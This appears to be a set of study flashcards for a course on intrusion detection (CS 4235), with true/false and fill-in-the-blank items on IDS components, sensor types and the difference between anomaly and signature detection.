CS 4235 - Intrusion Detection

An inline sensor monitors a copy of network traffic; the actual traffic does not pass through the device.

False

The IDS component responsible for collecting data is the user interface.

False

The _____ is the IDS component that analyzes the data collected by the sensor for signs of unauthorized or undesired activity or for events that might be of interest to the security administrator.

Analyzer

_____ involves the collection of data relating to the behavior of legitimate users over a period of time.

Anomaly Detection

A _____ monitors the characteristics of a single host and the events occurring within that host for suspicious activity.

Host-based IDS

A(n) _____ is inserted into a network segment so that the traffic that it is monitoring must pass through the sensor.

Inline Sensor

A _____ monitors network traffic for particular network segments or devices and analyzes network, transport, and application protocols to identify suspicious activity.

Network-based IDS

_____ involves an attempt to define a set of rules or attack patterns that can be used to decide if a given behavior is that of an intruder.

Signature Detection

A common location for a NIDS sensor is just inside the external firewall.

True

Intruders typically use steps from a common attack methodology.

True

Intrusion detection is based on the assumption that the behavior of the intruder differs from that of a legitimate user in ways that can be quantified.

True

Network-based intrusion detection makes use of signature detection and anomaly detection.

True

The primary purpose of an IDS is to detect intrusions, log suspicious events, and send alerts.

True

To be of practical use an IDS should detect a substantial percentage of intrusions while keeping the false alarm rate at an acceptable level.

True